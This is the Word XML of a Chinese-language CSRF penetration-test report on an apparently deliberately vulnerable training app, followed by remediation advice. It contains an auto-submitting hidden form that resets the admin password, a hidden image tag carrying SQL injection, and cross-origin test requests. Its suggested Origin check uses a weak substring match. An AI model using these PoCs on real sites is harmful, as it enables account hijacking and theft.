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C3333"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>CSRF 跨站请求伪造</w:t>
        <w:br/>
        <w:t>漏洞检测报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测目标：用户信息管理平台</w:t>
        <w:br/>
        <w:t>检测日期：2026-07-14</w:t>
        <w:br/>
        <w:t>检测分支：vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>1. 报告概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本报告对用户信息管理平台进行了 CSRF（跨站请求伪造）漏洞专项检测。检测发现共 8 类 CSRF 相关安全漏洞，严重级别均为高危或以上。所有敏感操作接口均未实施 CSRF 防护机制。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检测目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户信息管理平台 — 所有 POST 接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测分支</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vulnerable（漏洞版）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2026-07-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>curl / 手动渗透测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>alice（普通用户）/ admin（管理员）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>测试端点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /login, POST /register, POST /recharge, POST /change-password, POST /upload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3333"/>
        </w:rPr>
        <w:t>2. 漏洞 1：登录接口无 CSRF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CSRF — 登录表单无 Token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/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>登录页面表单中没有包含 CSRF Token。攻击者可构造恶意页面，诱使用户在不知情的情况下使用攻击者控制的凭证提交登录表单，导致用户的登录状态被替换为攻击者的账号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证方法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curl -s http://localhost:5000/login | grep -oP "csrf_token|CSRF"</w:t>
        <w:br/>
        <w:t># 输出为空 → 无 CSRF Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>3. 漏洞 2：注册接口无 CSRF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CSRF — 注册表单无 Token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/register</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>注册页面表单中没有包含 CSRF Token。攻击者可构造恶意页面，诱使用户在不知情的情况下提交注册表单，创建大量垃圾账号耗尽服务器资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>4. 漏洞 3：修改密码接口无 CSRF 防护（严重）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CSRF — 修改密码无任何防护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/change-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/change-password 接口没有任何 CSRF 防护措施：无 Token 校验、无 Referer 校验、无 Origin 校验、无原密码验证。攻击者可构造一个恶意页面，当已登录用户访问时，自动向 /change-password 发送 POST 请求，将用户的密码修改为攻击者指定的值，实现账号劫持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC 攻击代码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&lt;!-- 攻击者构造的恶意 HTML 页面 --&gt;</w:t>
        <w:br/>
        <w:t>&lt;html&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;点击领取优惠券&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;form id="csrf" method="POST" action="http://target.com/change-password"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="username" value="admin"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="new_password" value="hacked123"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;script&gt;document.getElementById("csrf").submit();&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>从 Origin: evil.com、Referer: evil.com 提交</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>HTTP 状态码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>302 重定向（请求被接受）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>密码是否被修改</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 是 — 可用新密码 hacked123 登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Origin 校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>❌ 无 — evil.com 被接受</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Referer 校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>❌ 无 — evil.com 被接受</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>空 Origin/Referer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 也被接受</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GET 请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>❌ 405 拒绝（仅限 POST）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3333"/>
        </w:rPr>
        <w:t>5. 漏洞 4：充值接口无 CSRF 防护（严重）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CSRF — 充值无任何防护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/recharge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/recharge 接口没有任何 CSRF 防护措施。攻击者可构造恶意页面，当已登录的管理员访问时，自动向其他账户充值或扣款。结合负金额漏洞可清空任意账户余额。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>从 Origin: evil.net 提交 recharge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>HTTP 状态码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>302 重定向（请求被接受）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ admin 为 alice 充值 99999 成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Origin 校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>❌ 无 — evil.net 被接受</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Referer 校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>❌ 无 — evil.net 被接受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3333"/>
        </w:rPr>
        <w:t>6. 漏洞 5：Session Cookie 缺少 SameSite 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Cookie 安全配置缺失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Set-Cookie 响应头</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Session Cookie 没有设置 SameSite 属性（Strict 或 Lax），浏览器默认行为（SameSite=Lax）仅在部分现代浏览器中生效。旧版浏览器或通过显式 POST 表单提交时，Cookie 仍会被发送，导致 CSRF 攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证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-s -D - -d "username=admin&amp;password=admin123" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/login | grep Set-Cookie</w:t>
        <w:br/>
        <w:t># Set-Cookie: session=...; HttpOnly; Path=/</w:t>
        <w:br/>
        <w:t># ⚠️ 缺少 SameSite 属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>7. 漏洞 6：未校验 Content-Type 请求头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Content-Type 检查缺失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🟢 低危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漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>服务器未验证请求的 Content-Type 是否为 application/x-www-form-urlencoded。即使使用 application/json 提交，请求仍然被接受和处理。这使得攻击者可以使用更灵活的方式构造 CSRF 负载。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使用 JSON Content-Type 提交修改密码</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -d '{"username":"alice","new_password":"test"}' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/change-password</w:t>
        <w:br/>
        <w:t># ✅ HTTP 302 请求被接受</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>8. 漏洞 7：上传接口无 CSRF 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CSRF — 文件上传无 Token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/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/upload 接口没有 CSRF Token 校验。攻击者可通过构造 multipart/form-data 表单，诱使用户上传恶意文件。虽然浏览器跨域表单无法读取文件，但结合其他漏洞或通过同站攻击仍可被利用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>9. 漏洞 8：搜索接口无 CSRF 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CSRF — GET 请求无防护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🟢 低危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GET /search?keyword=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/search 接口使用 GET 方法且没有 CSRF Token。攻击者可以通过 &lt;img&gt;、&lt;script&gt;、&lt;iframe&gt; 等标签触发 GET 请求，结合之前发现的 SQL 注入漏洞，可在用户不知情的情况下执行恶意 SQL 查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC 攻击向量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&lt;!-- 恶意 SQL 注入 + CSRF 组合攻击 --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src="http://target.com/search?keyword=%27%20UNION%20SELECT%20...%20--"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     style="display:none" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>10. 漏洞矩阵与修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>漏洞矩阵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417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134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>利用难度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登录接口无 CSRF Token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登录状态劫持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注册接口无 CSRF Token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批量注册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修改密码无 CSRF 防护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账号完全劫持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充值接口无 CSRF 防护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资金盗取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Cookie 无 SameSite 属性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CSRF 辅助利用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未校验 Content-Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🟢 低危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绕过检测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上传接口无 CSRF Token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恶意文件上传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搜索接口 CSRF + SQL 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🟢 低危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数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>🔴 紧急修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. 添加 CSRF Token 校验（使用 flask-wtf）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from flask_wtf.csrf import CSRFProtect, generate_csrf</w:t>
        <w:br/>
        <w:br/>
        <w:t>csrf = CSRFProtect(app)</w:t>
        <w:br/>
        <w:br/>
        <w:t># 模板中注入 Token</w:t>
        <w:br/>
        <w:t>&lt;form method="POST" action="/change-password"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="csrf_token" value="{{ csrf_token() }}"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ...</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. 设置 SameSite Cookie 属性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app.config["SESSION_COOKIE_SAMESITE"] = "Strict"</w:t>
        <w:br/>
        <w:t># 或 "Lax" — 允许 GET 方式的跨站请求携带 Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. 敏感操作验证 Referer/Origin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from flask import request, abort</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/change-password", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def change_password():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    origin = request.headers.get("Origin")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    referer = request.headers.get("Referer")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    allowed_host = request.host</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if origin and allowed_host not in origin:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        abort(403)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if referer and allowed_host not in referer:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        abort(403)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC3333"/>
        </w:rPr>
        <w:t>🟡 建议修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. 敏感操作要求验证原密码（修改密码/扣款等）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. 验证 Content-Type 为 application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>6. 验证请求方法（GET 不应修改状态）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>7. 添加速率限制防止批量 CSRF 攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>8. 使用 Double Submit Cookie 模式作为备选方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>9. 关键操作添加二次确认（验证码/生物识别）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999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18"/>
        </w:rPr>
        <w:t>免责声明：本报告仅用于安全教育和漏洞验证。请在获得授权的前提下进行安全测试。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